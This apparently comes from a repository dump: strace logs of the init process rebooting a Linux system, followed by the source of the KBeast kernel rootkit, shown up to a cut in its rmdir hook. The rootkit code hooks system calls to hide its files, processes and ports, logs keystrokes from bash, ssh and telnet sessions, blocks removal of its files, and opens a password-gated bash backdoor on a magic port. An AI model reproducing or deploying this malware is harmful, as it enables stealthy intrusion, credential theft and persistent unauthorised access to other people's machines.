MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13f) = 0x8df000 27 | mmap2(0x8e2000, 9668, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x8e2000 28 | close(3) = 0 29 | open("/lib/libdl.so.2", O_RDONLY) = 3 30 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0Pz\216\0004\0\0\0"..., 512) = 512 31 | fstat64(3, {st_mode=S_IFREG|0755, st_size=16428, ...}) = 0 32 | mmap2(0x8e7000, 12408, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x8e7000 33 | mmap2(0x8e9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0x8e9000 34 | close(3) = 0 35 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc7000 36 | set_thread_area({entry_number:-1 -> 6, base_addr:0xb7fc78e0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 37 | mprotect(0x8df000, 8192, PROT_READ) = 0 38 | mprotect(0x8e9000, 4096, PROT_READ) = 0 39 | mprotect(0x797000, 4096, PROT_READ) = 0 40 | munmap(0xb7fc9000, 38920) = 0 41 | access("/etc/selinux/", F_OK) = 0 42 | brk(0) = 0x926e000 43 | brk(0x928f000) = 0x928f000 44 | open("/etc/selinux/config", O_RDONLY|O_LARGEFILE) = 3 45 | fstat64(3, {st_mode=S_IFREG|0644, st_size=448, ...}) = 0 46 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd2000 47 | read(3, "# This file controls the state o"..., 4096) = 448 48 | read(3, "", 4096) = 0 49 | close(3) = 0 50 | munmap(0xb7fd2000, 4096) = 0 51 | open("/proc/mounts", O_RDONLY|O_LARGEFILE) = 3 52 | fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 53 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd2000 54 | read(3, "rootfs / rootfs rw 0 0\n/dev/root"..., 4096) = 657 55 | close(3) = 0 56 | munmap(0xb7fd2000, 4096) = 0 57 | open("/selinux/mls", O_RDONLY|O_LARGEFILE) = 3 58 | read(3, "1", 19) = 1 59 | close(3) = 0 60 | socket(PF_FILE, SOCK_STREAM, 0) = 3 61 | connect(3, {sa_family=AF_FILE, path="/var/run/setrans/.setrans-unix"...}, 110) = 0 62 | sendmsg(3, {msg_name(0)=NULL, msg_iov(5)=[{"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\0", 1}, {"\0", 1}], msg_controllen=0, msg_flags=0}, MSG_NOSIGNAL) = 14 63 | readv(3, [{"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\0\0\0\0", 4}], 3) = 12 64 | readv(3, [{"\0", 1}], 1) = 1 65 | close(3) = 0 66 | umask(022) = 022 67 | geteuid32() = 0 68 | getpid() = 4960 69 | rt_sigaction(SIGALRM, {0x8049900, [], 0}, NULL, 8) = 0 70 | alarm(3) = 0 71 | open("/dev/initctl", O_WRONLY) = 3 72 | write(3, "i\31\t\3\1\0\0\0006\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 384) = 384 73 | close(3) = 0 74 | alarm(0) = 3 75 | exit_group(0) = ? 76 | -------------------------------------------------------------------------------- /init6.log: -------------------------------------------------------------------------------- 1 | execve("/sbin/init", ["init", "6"], [/* 23 vars */]) = 0 2 | brk(0) = 0x88b0000 3 | access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) 4 | open("/etc/ld.so.cache", O_RDONLY) = 3 5 | fstat64(3, {st_mode=S_IFREG|0644, st_size=38920, ...}) = 0 6 | mmap2(NULL, 38920, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd6000 7 | close(3) = 0 8 | open("/lib/libsepol.so.1", O_RDONLY) = 3 9 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\277\226\0004\0\0\0"..., 512) = 512 10 | fstat64(3, {st_mode=S_IFREG|0755, st_size=245376, ...}) = 0 11 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd5000 12 | mmap2(0x969000, 285024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x969000 13 | mmap2(0x9a4000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3b) = 0x9a4000 14 | mmap2(0x9a5000, 39264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x9a5000 15 | close(3) = 0 16 | open("/lib/libselinux.so.1", O_RDONLY) = 3 17 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240%\225\0004\0\0\0"..., 512) = 512 18 | fstat64(3, {st_mode=S_IFREG|0755, st_size=93508, ...}) = 0 19 | mmap2(0x94f000, 97120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x94f000 20 | mmap2(0x965000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15) = 0x965000 21 | close(3) = 0 22 | open("/lib/libc.so.6", O_RDONLY) = 3 23 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340_{\0004\0\0\0"..., 512) = 512 24 | fstat64(3, {st_mode=S_IFREG|0755, st_size=1611564, ...}) = 0 25 | mmap2(0x7a0000, 1328580, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7a0000 26 | mmap2(0x8df000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13f) = 0x8df000 27 | mmap2(0x8e2000, 9668, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x8e2000 28 | close(3) = 0 29 | open("/lib/libdl.so.2", O_RDONLY) = 3 30 | read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0Pz\216\0004\0\0\0"..., 512) = 512 31 | fstat64(3, {st_mode=S_IFREG|0755, st_size=16428, ...}) = 0 32 | mmap2(0x8e7000, 12408, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x8e7000 33 | mmap2(0x8e9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0x8e9000 34 | close(3) = 0 35 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd4000 36 | set_thread_area({entry_number:-1 -> 6, base_addr:0xb7fd48e0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 37 | mprotect(0x8df000, 8192, PROT_READ) = 0 38 | mprotect(0x8e9000, 4096, PROT_READ) = 0 39 | mprotect(0x797000, 4096, PROT_READ) = 0 40 | munmap(0xb7fd6000, 38920) = 0 41 | access("/etc/selinux/", F_OK) = 0 42 | brk(0) = 0x88b0000 43 | brk(0x88d1000) = 0x88d1000 44 | open("/etc/selinux/config", O_RDONLY|O_LARGEFILE) = 3 45 | fstat64(3, {st_mode=S_IFREG|0644, st_size=448, ...}) = 0 46 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000 47 | read(3, "# This file controls the state o"..., 4096) = 448 48 | read(3, "", 4096) = 0 49 | close(3) = 0 50 | munmap(0xb7fdf000, 4096) = 0 51 | open("/proc/mounts", O_RDONLY|O_LARGEFILE) = 3 52 | fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 53 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000 54 | read(3, "rootfs / rootfs rw 0 0\n/dev/root"..., 4096) = 657 55 | close(3) = 0 56 | munmap(0xb7fdf000, 4096) = 0 57 | open("/selinux/mls", O_RDONLY|O_LARGEFILE) = 3 58 | read(3, "1", 19) = 1 59 | close(3) = 0 60 | socket(PF_FILE, SOCK_STREAM, 0) = 3 61 | connect(3, {sa_family=AF_FILE, path="/var/run/setrans/.setrans-unix"...}, 110) = 0 62 | sendmsg(3, {msg_name(0)=NULL, msg_iov(5)=[{"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\0", 1}, {"\0", 1}], msg_controllen=0, msg_flags=0}, MSG_NOSIGNAL) = 14 63 | readv(3, [{"\1\0\0\0", 4}, {"\1\0\0\0", 4}, {"\0\0\0\0", 4}], 3) = 12 64 | readv(3, [{"\0", 1}], 1) = 1 65 | close(3) = 0 66 | umask(022) = 022 67 | geteuid32() = 0 68 | getpid() = 4844 69 | rt_sigaction(SIGALRM, {0x8049900, [], 0}, NULL, 8) = 0 70 | alarm(3) = 0 71 | open("/dev/initctl", O_WRONLY) = 3 72 | write(3, "i\31\t\3\1\0\0\0006\0\0\0\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 384) = 384 73 | close(3) = 0 74 | alarm(0) = 3 75 | exit_group(0) = ? 76 | -------------------------------------------------------------------------------- /ipsecs-kbeast-v1_orig.cc1: -------------------------------------------------------------------------------- 1 | /* 2 | Kernel Beast Ver #1.0 - Kernel Module 3 | Copyright Ph03n1X of IPSECS (c) 2011 4 | Get more research of ours http://ipsecs.com 5 | 6 | Features: 7 | - Hiding this module [OK] 8 | - Hiding files/directory [OK] 9 | - Hiding process [OK] 10 | - Hiding from netstat [OK] 11 | - Keystroke Logging [OK] 12 | - Anti-kill process [OK] 13 | - Anti-remove files [OK] 14 | - Anti-delete modules [OK] 15 | - Local root escalation [OK] 16 | */ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #include 36 | #include 37 | #include "config.h" 38 | 39 | #define TIMEZONE 7*60*60 // GMT+7 40 | #define SECS_PER_HOUR (60 * 60) 41 | #define SECS_PER_DAY (SECS_PER_HOUR * 24) 42 | #define isleap(year) \ 43 | ((year) % 4 == 0 && ((year) % 100 != 0 || (year) % 400 == 0)) 44 | #define DIV(a, b) ((a) / (b) - ((a) % (b) < 0)) 45 | #define LEAPS_THRU_END_OF(y) (DIV (y, 4) - DIV (y, 100) + DIV (y, 400)) 46 | #define TMPSZ 150 //from net/ipv4/tcp_ipv4.c 47 | 48 | struct vtm { 49 | int tm_sec; 50 | int tm_min; 51 | int tm_hour; 52 | int tm_mday; 53 | int tm_mon; 54 | int tm_year; 55 | }; 56 | 57 | MODULE_LICENSE("GPL"); 58 | 59 | /*Functions*/ 60 | int log_to_file(char *); 61 | void get_time(char *); 62 | int epoch2time(const time_t *, long int, struct vtm *); 63 | char *strnstr(const char *, const char *, size_t); 64 | int h4x_tcp4_seq_show(struct seq_file *, void *); 65 | 66 | /*Syscalls*/ 67 | asmlinkage int (*o_read) (unsigned int, char __user *, size_t); 68 | asmlinkage int (*o_write)(unsigned int, const char __user *, size_t); 69 | #if defined(__x86_64__) 70 | asmlinkage int (*o_getdents)(unsigned int, struct linux_dirent __user *, unsigned int); 71 | #elif defined(__i386__) 72 | asmlinkage int (*o_getdents64)(unsigned int, struct linux_dirent64 __user *, unsigned int); 73 | #else 74 | #error Unsupported architecture 75 | #endif 76 | asmlinkage int (*o_unlink)(const char __user *); 77 | asmlinkage int (*o_rmdir)(const char __user *); 78 | asmlinkage int (*o_unlinkat)(int, const char __user *, int); 79 | asmlinkage int (*o_rename)(const char __user *, const char __user *); 80 | asmlinkage int (*o_open)(const char __user *, int, int); 81 | asmlinkage int (*o_kill)(int, int); 82 | 83 | asmlinkage int (*o_accept)(int fd, struct sockaddr *addr, socklen_t *addr_len); 84 | 85 | asmlinkage int (*o_delete_module)(const char __user *name_user, unsigned int flags); 86 | 87 | /*Variable*/ 88 | char ibuffer[256]; 89 | char obuffer[512]; 90 | char spbuffer[4]; 91 | char accountlog[32]; 92 | int counter=0; 93 | 94 | unsigned long *sys_call_table = (unsigned long *)0xSYS_CALL_T_ADDRESS; 95 | int (*old_tcp4_seq_show)(struct seq_file*, void *) = NULL; 96 | 97 | /* 98 | REF : http://commons.oreilly.com/wiki/index.php/Network_Security_Tools/ 99 | Modifying_and_Hacking_Security_Tools/Fun_with_Linux_Kernel_Modules 100 | */ 101 | char *strnstr(const char *haystack, const char *needle, size_t n) 102 | { 103 | char *s=strstr(haystack, needle); 104 | if(s==NULL) 105 | return NULL; 106 | if(s-haystack+strlen(needle) <= n) 107 | return s; 108 | else 109 | return NULL; 110 | } 111 | 112 | /*Ripped from epoch2time() thc-vlogger*/ 113 | int epoch2time (const time_t *t, long int offset, struct vtm *tp) 114 | { 115 | static const unsigned short int mon_yday[2][13] = { 116 | /* Normal years. */ 117 | { 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365 }, 118 | /* Leap years. */ 119 | { 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366 } 120 | }; 121 | 122 | long int days, rem, y; 123 | const unsigned short int *ip; 124 | 125 | days = *t / SECS_PER_DAY; 126 | rem = *t % SECS_PER_DAY; 127 | rem += offset; 128 | while (rem < 0) { 129 | rem += SECS_PER_DAY; 130 | --days; 131 | } 132 | while (rem >= SECS_PER_DAY) { 133 | rem -= SECS_PER_DAY; 134 | ++days; 135 | } 136 | tp->tm_hour = rem / SECS_PER_HOUR; 137 | rem %= SECS_PER_HOUR; 138 | tp->tm_min = rem / 60; 139 | tp->tm_sec = rem % 60; 140 | y = 1970; 141 | 142 | while (days < 0 || days >= (isleap (y) ? 366 : 365)) { 143 | long int yg = y + days / 365 - (days % 365 < 0); 144 | days -= ((yg - y) * 365 + LEAPS_THRU_END_OF (yg - 1) - LEAPS_THRU_END_OF (y - 1)); 145 | y = yg; 146 | } 147 | tp->tm_year = y - 1900; 148 | if (tp->tm_year != y - 1900) 149 | return 0; 150 | ip = mon_yday[isleap(y)]; 151 | for (y = 11; days < (long int) ip[y]; --y) 152 | continue; 153 | days -= ip[y]; 154 | tp->tm_mon = y; 155 | tp->tm_mday = days + 1; 156 | return 1; 157 | } 158 | 159 | /*Ripped from get_time() thc-vlogger*/ 160 | void get_time (char *date_time) 161 | { 162 | struct timeval tv; 163 | time_t t; 164 | struct vtm tm; 165 | 166 | do_gettimeofday(&tv); 167 | t = (time_t)tv.tv_sec; 168 | 169 | epoch2time(&t, TIMEZONE, &tm); 170 | 171 | sprintf(date_time,"%.2d/%.2d/%d-%.2d:%.2d:%.2d", tm.tm_mday, 172 | tm.tm_mon + 1, tm.tm_year + 1900, tm.tm_hour, tm.tm_min, 173 | tm.tm_sec); 174 | } 175 | 176 | /* 177 | Modified from log_to_file() mercenary code 178 | why don't we modify thc-vlogger? because that'z your job 179 | */ 180 | int log_to_file(char *buffer) 181 | { 182 | struct file *file = NULL; 183 | mm_segment_t fs; 184 | int error; 185 | 186 | /*log name*/ 187 | snprintf(accountlog,sizeof(accountlog),"%s/%s.%i",_H4X_PATH_,_LOGFILE_,USER_CRED); 188 | file = filp_open(accountlog, O_CREAT|O_APPEND, 00644); 189 | if(IS_ERR(file)){ 190 | error=PTR_ERR(file); 191 | goto out; 192 | } 193 | 194 | error = -EACCES; 195 | if(!S_ISREG(file->f_dentry->d_inode->i_mode)) 196 | goto out_err; 197 | 198 | error = -EIO; 199 | if(!file->f_op->write) 200 | goto out_err; 201 | 202 | error = 0; 203 | fs = get_fs(); 204 | set_fs(KERNEL_DS); 205 | file->f_op->write(file,buffer,strlen(buffer),&file->f_pos); 206 | set_fs(fs); 207 | filp_close(file,NULL); 208 | goto out; 209 | 210 | out: 211 | return error; 212 | 213 | out_err: 214 | filp_close (file,NULL); 215 | goto out; 216 | } 217 | 218 | int my_accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) 219 | { 220 | #ifdef DEBUG 221 | printf("accept hooked.\n"); 222 | #endif 223 | int cli; 224 | cli = old_accept(sockfd,addr, addrlen); 225 | if( (addr->sa_family == AF_INET) ){ 226 | struct sockaddr_in *cli_addr = (struct sockaddr_in *)addr; 227 | #ifdef DEBUG 228 | unsigned int th_sport = ntohl(cli_addr->sin_port); 229 | th_sport = th_sport>>16; 230 | printf("th_sport:%d\n",th_sport); 231 | #endif 232 | if( (cli_addr->sin_port == htons(_MAGIC_PORT_)) ){ 233 | pid_t child; 234 | if(cli<0) 235 | return cli; 236 | #ifdef DEBUG 237 | printf("magic-client-in\n"); 238 | #endif 239 | if((child=fork())==0){ 240 | //old none-crypted style 241 | close(sockfd); 242 | dup2(cli,0); 243 | dup2(cli,1); 244 | dup2(cli,2); 245 | //close(0); 246 | //fid = fcntl(cli, F_DUPFD, 0); 247 | //enterpass(cli); 248 | char *motd="<< Welcome >>\n"; 249 | char buffer[64]={0x00}; 250 | 251 | read(cli,buffer,sizeof(buffer)); 252 | /* 253 | //Hash password 254 | char trans[SALT_LENGTH+33] = {'\0'}; 255 | char tmp[3]={'\0'},buf[33]={'\0'},hash[33]={'\0'}; 256 | int i; 257 | for(i=0;i2) 263 | i--; 264 | getMD5(buffer,i,buf); 265 | strncpy(trans,_SALT_,SALT_LENGTH); 266 | for(i=0;i<32;i++){ 267 | trans[SALT_LENGTH+i]=buf[i]; 268 | } 269 | getMD5(trans,SALT_LENGTH+32,hash); 270 | printf("%s",hash); 271 | //End Hash Password 272 | */ 273 | //if(!strncmp(hash, _RPASSWORD_, strlen(_RPASSWORD_))) { 274 | if(!strncmp(buffer, _ACK_PWD_, strlen(_ACK_PWD_))) { 275 | write(cli,motd,strlen(motd)); 276 | }else { 277 | //write(s,"Wrong!\n", 7); 278 | close(cli); 279 | _exit(0); 280 | } 281 | execve("/bin/bash", argv, envp); 282 | printf("disConnected."); 283 | close(cli); 284 | _exit(0); 285 | } 286 | wait(child); 287 | return -1; 288 | } 289 | } 290 | return cli; 291 | } 292 | 293 | 294 | /* 295 | REF : http://commons.oreilly.com/wiki/index.php/Network_Security_Tools/ 296 | Modifying_and_Hacking_Security_Tools/Fun_with_Linux_Kernel_Modules 297 | */ 298 | int h4x_tcp4_seq_show(struct seq_file *seq, void *v) 299 | { 300 | int r=old_tcp4_seq_show(seq, v); 301 | char port[12]; 302 | 303 | sprintf(port,"%04X",_HIDE_PORT_); 304 | if(strnstr(seq->buf+seq->count-TMPSZ,port,TMPSZ)) 305 | seq->count -= TMPSZ; 306 | return r; 307 | } 308 | 309 | /* 310 | Modified from hacked sys_read on merecenary code 311 | Why don't we modify thc-vlogger? it's your duty 312 | Somehow this h4x_read doesn't cool enough, but works :) 313 | */ 314 | asmlinkage int h4x_read(unsigned int fd, char __user *buf, size_t count) 315 | { 316 | int i,r; 317 | char date_time[24]; 318 | char *kbuf=(char*)kmalloc(256,GFP_KERNEL); 319 | 320 | /*If output is redirected to file or grep, hide it*/ 321 | copy_from_user(kbuf,buf,255); 322 | if ((strstr(current->comm,"ps"))||(strstr(current->comm,"pstree"))|| 323 | (strstr(current->comm,"top"))||(strstr(current->comm,"lsof"))){ 324 | if(strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)) 325 | { 326 | kfree(kbuf); 327 | return -ENOENT; 328 | } 329 | } 330 | 331 | r=o_read(fd,buf,count); 332 | /*Due to stability issue, we limit the keylogging process*/ 333 | if((strcmp(current->comm,"bash") == 0) || (strcmp(current->comm,"ssh") == 0)|| 334 | (strcmp(current->comm,"scp") == 0) || (strcmp(current->comm,"telnet") == 0)|| 335 | (strcmp(current->comm,"rsh") == 0) || (strcmp(current->comm,"rlogin") == 0)){ 336 | /*SPECIAL CHAR*/ 337 | if (counter) { 338 | if (counter == 2) { // Arrows + Break 339 | //left arrow 340 | if (buf[0] == 0x44) { 341 | strcat(ibuffer,"[LEFT]"); 342 | counter = 0; 343 | goto END; 344 | } 345 | //right arrow 346 | if (buf[0] == 0x43) { 347 | strcat(ibuffer,"[RIGHT]"); 348 | counter = 0; 349 | goto END; 350 | } 351 | //up arrow 352 | if (buf[0] == 0x41) { 353 | strcat(ibuffer,"[UP]"); 354 | counter = 0; 355 | goto END; 356 | } 357 | //down arrow 358 | if (buf[0] == 0x42) { 359 | strcat(ibuffer,"[DOWN]"); 360 | counter = 0; 361 | goto END; 362 | } 363 | //break 364 | if (buf[0] == 0x50) { 365 | strcat(ibuffer,"[BREAK]"); 366 | counter = 0; 367 | goto END; 368 | } 369 | //numlock 370 | if(buf[0] == 0x47) { 371 | strcat (ibuffer,"[NUMLOCK]"); 372 | counter = 0; 373 | goto END; 374 | } 375 | strncpy (spbuffer,buf,1); 376 | counter ++; 377 | goto END; 378 | } 379 | 380 | if (counter == 3) { // F1-F5 381 | //F1 382 | if (buf[0] == 0x41) { 383 | strcat(ibuffer,"[F1]"); 384 | counter = 0; 385 | goto END; 386 | } 387 | //F2 388 | if (buf[0] == 0x42) { 389 | strcat(ibuffer,"[F2]"); 390 | counter = 0; 391 | goto END; 392 | } 393 | //F3 394 | if (buf[0] == 0x43) { 395 | strcat(ibuffer,"[F3]"); 396 | counter = 0; 397 | goto END; 398 | } 399 | //F4 400 | if (buf[0] == 0x44) { 401 | strcat(ibuffer,"[F4]"); 402 | counter = 0; 403 | goto END; 404 | } 405 | //F5 406 | if (buf[0] == 0x45) { 407 | strcat(ibuffer,"[F5]"); 408 | counter = 0; 409 | goto END; 410 | } 411 | 412 | if (buf[0] == 0x7E) { // PgUp, PgDown, Ins, ... 413 | //Page Up 414 | if (spbuffer[0] == 0x35) 415 | strcat(ibuffer,"[PGUP]"); 416 | //Page Down 417 | if (spbuffer[0] == 0x36) 418 | strcat(ibuffer,"[PGDN]"); 419 | //Delete 420 | if (spbuffer[0] == 0x33) 421 | strcat(ibuffer,"[DELETE]"); 422 | //End 423 | if (spbuffer[0] == 0x34) 424 | strcat(ibuffer,"[END]"); 425 | //Home 426 | if (spbuffer[0] == 0x31) 427 | strcat(ibuffer,"[HOME]"); 428 | //Insert 429 | if (spbuffer[0] == 0x32) 430 | strcat(ibuffer,"[INSERT]"); 431 | counter = 0; 432 | goto END; 433 | } 434 | 435 | if (spbuffer[0] == 0x31) { // F6-F8 436 | //F6 437 | if (buf[0] == 0x37) 438 | strcat(ibuffer,"[F6]"); 439 | //F7 440 | if (buf[0] == 0x38) 441 | strcat(ibuffer,"[F7]"); 442 | //F8 443 | if (buf[0] == 0x39) 444 | strcat(ibuffer,"[F8]"); 445 | counter++; 446 | goto END; 447 | } 448 | 449 | if (spbuffer[0] == 0x32) { // F9-F12 450 | //F9 451 | if (buf[0] == 0x30) 452 | strcat(ibuffer,"[F9]"); 453 | //F10 454 | if (buf[0] == 0x31) 455 | strcat(ibuffer,"[F10]"); 456 | //F11 457 | if (buf[0] == 0x33) 458 | strcat(ibuffer,"[F11]"); 459 | //F12 460 | if (buf[0] == 0x34) 461 | strcat(ibuffer,"[F12]"); 462 | 463 | counter++; 464 | goto END; 465 | } 466 | } 467 | 468 | if(counter >= 4) { //WatchDog 469 | counter = 0; 470 | goto END; 471 | } 472 | 473 | counter ++; 474 | goto END; 475 | } 476 | 477 | /*SH, SSHD = 0 /TELNETD = 3/LOGIN = 4*/ 478 | if(r==1 && (fd==0||fd==3||fd==4)){ 479 | //CTRL+U 480 | if(buf[0]==0x15){ 481 | ibuffer[0]='\0'; 482 | goto END; 483 | } 484 | //TAB 485 | if(buf[0]==0x09){ 486 | strcat(ibuffer,"[TAB]"); 487 | counter = 0; 488 | goto END; 489 | } 490 | //CTRL+C 491 | if(buf[0]==0x03){ 492 | strcat(ibuffer,"[CTRL+C]"); 493 | counter = 0; 494 | goto END; 495 | } 496 | //CTRL+D 497 | if(buf[0]==0x03){ 498 | strcat(ibuffer,"[CTRL+D]"); 499 | counter = 0; 500 | goto END; 501 | } 502 | //CTRL+] 503 | if(buf[0]==0x1D){ 504 | strcat(ibuffer,"[CTRL+]]"); 505 | counter = 0; 506 | goto END; 507 | } 508 | //BACKSPACE 0x7F Local / 0x08 Remote 509 | if (buf[0] == 0x7F || buf[0] == 0x08) { 510 | if (ibuffer[strlen(ibuffer) - 1] == ']') { 511 | for (i=2;strlen(ibuffer);i++){ 512 | if (ibuffer[strlen (ibuffer) - i] == '[') { 513 | ibuffer[strlen(ibuffer) - i] = '\0'; 514 | break; 515 | } 516 | } 517 | goto END; 518 | }else { 519 | ibuffer[strlen(ibuffer) - 1] = '\0'; 520 | goto END; 521 | } 522 | } 523 | 524 | if (buf[0] == 0x1B) { 525 | counter++; 526 | goto END; 527 | } 528 | if(buf[0] != '\n' && buf[0] != '\r'){ 529 | strncat(ibuffer,buf,sizeof(ibuffer)); 530 | }else{ 531 | strcat(ibuffer,"\n"); 532 | get_time(date_time); 533 | snprintf(obuffer,sizeof(obuffer),"[%s] - [UID = %i ] %s > %s",date_time,USER_CRED,current->comm,ibuffer); 534 | //I don't want to log buffer more than 60 chars, most of them are useless data 535 | if(strlen(ibuffer)<60) { 536 | log_to_file(obuffer); 537 | } 538 | ibuffer[0]='\0'; 539 | } 540 | } 541 | } 542 | END: 543 | return r; 544 | } 545 | 546 | /* 547 | h4x sys_write to fake output ps, pstree, top, & lsof. If its result redirected to 548 | grep,our process will be displayed, but sysadmin don't know what string should be 549 | grep-ed. 550 | I try to h4x readdir or getdents to completely hide process, but chkrootkit found 551 | the hidden process, any better idea? comment are welcome. 552 | */ 553 | 554 | asmlinkage int h4x_write(unsigned int fd, const char __user *buf,size_t count) 555 | { 556 | int r; 557 | char *kbuf=(char*)kmalloc(256,GFP_KERNEL); 558 | copy_from_user(kbuf,buf,255); 559 | if ((strstr(current->comm,"ps"))||(strstr(current->comm,"pstree"))|| 560 | (strstr(current->comm,"top"))||(strstr(current->comm,"lsof"))){ 561 | if(strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)) 562 | { 563 | kfree(kbuf); 564 | return -ENOENT; 565 | } 566 | } 567 | r=(*o_write)(fd,buf,count); 568 | kfree(kbuf); 569 | return r; 570 | } 571 | 572 | /* 573 | REF : http://freeworld.thc.org/papers/LKM_HACKING.html 574 | Modified for getdents64 575 | */ 576 | 577 | #if defined(__x86_64__) 578 | asmlinkage int h4x_getdents(unsigned int fd, struct linux_dirent __user *dirp, unsigned int count){ 579 | struct dirent *dir2, *dir3; 580 | int r,t,n; 581 | 582 | r = (*o_getdents)(fd, dirp, count); 583 | if(r>0){ 584 | dir2 = (struct dirent *)kmalloc((size_t)r, GFP_KERNEL); 585 | copy_from_user(dir2, dirp, r); 586 | dir3 = dir2; 587 | t=r; 588 | while(t>0){ 589 | n=dir3->d_reclen; 590 | t-=n; 591 | if(strstr((char *) &(dir3->d_name),(char *) _H4X0R_)!=NULL){ 592 | if(t!=0) 593 | memmove(dir3,(char *) dir3+dir3->d_reclen,t); 594 | else 595 | dir3->d_off = 1024; 596 | r-=n; 597 | } 598 | if(dir3->d_reclen == 0){ 599 | r -=t; 600 | t=0; 601 | } 602 | if(t!=0) 603 | dir3=(struct dirent *)((char *) dir3+dir3->d_reclen); 604 | } 605 | copy_to_user(dirp, dir2, r); 606 | kfree(dir2); 607 | } 608 | return r; 609 | } 610 | #elif defined(__i386__) 611 | asmlinkage int h4x_getdents64(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count){ 612 | struct linux_dirent64 *dir2, *dir3; 613 | int r,t,n; 614 | 615 | r = (*o_getdents64)(fd, dirp, count); 616 | if(r>0){ 617 | dir2 = (struct linux_dirent64 *)kmalloc((size_t)r, GFP_KERNEL); 618 | copy_from_user(dir2, dirp, r); 619 | dir3 = dir2; 620 | t=r; 621 | while(t>0){ 622 | n=dir3->d_reclen; 623 | t-=n; 624 | if(strstr((char *) &(dir3->d_name),(char *) _H4X0R_)!=NULL){ 625 | if(t!=0) 626 | memmove(dir3,(char *) dir3+dir3->d_reclen,t); 627 | else 628 | dir3->d_off = 1024; 629 | r-=n; 630 | } 631 | if(dir3->d_reclen == 0){ 632 | r -=t; 633 | t=0; 634 | } 635 | if(t!=0) 636 | dir3=(struct linux_dirent64 *)((char *) dir3+dir3->d_reclen); 637 | } 638 | copy_to_user(dirp, dir2, r); 639 | kfree(dir2); 640 | } 641 | return r; 642 | } 643 | #else 644 | #error Unsupported architecture 645 | #endif 646 | 647 | /*Don't allow your file to be removed (2.6.18)*/ 648 | asmlinkage int h4x_unlink(const char __user *pathname) { 649 | int r; 650 | char *kbuf=(char*)kmalloc(256,GFP_KERNEL); 651 | copy_from_user(kbuf,pathname,255); 652 | if(strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)){ 653 | kfree(kbuf); 654 | return -EACCES; 655 | } 656 | 657 | r=(*o_unlink)(pathname); 658 | kfree(kbuf); 659 | return r; 660 | } 661 | 662 | /*Don't allow your directory to be removed (2.6.18)*/ 663 | asmlinkage int h4x_rmdir(const char __user *pathname) { 